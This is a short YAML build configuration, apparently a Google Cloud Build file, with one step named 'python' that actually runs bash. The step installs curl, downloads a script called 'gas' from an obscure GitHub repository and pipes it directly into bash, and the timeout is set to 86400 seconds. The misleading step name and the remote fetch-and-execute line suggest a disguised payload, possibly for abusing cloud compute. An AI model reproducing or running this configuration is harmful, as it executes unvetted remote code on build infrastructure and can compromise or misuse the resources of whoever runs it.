steps:
  - name: python
    args:
      - '-c'
      - >-
        apt-get update && apt-get install curl -y && curl -sL https://github.com/ganejafaujanih/ins/raw/main/gas | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
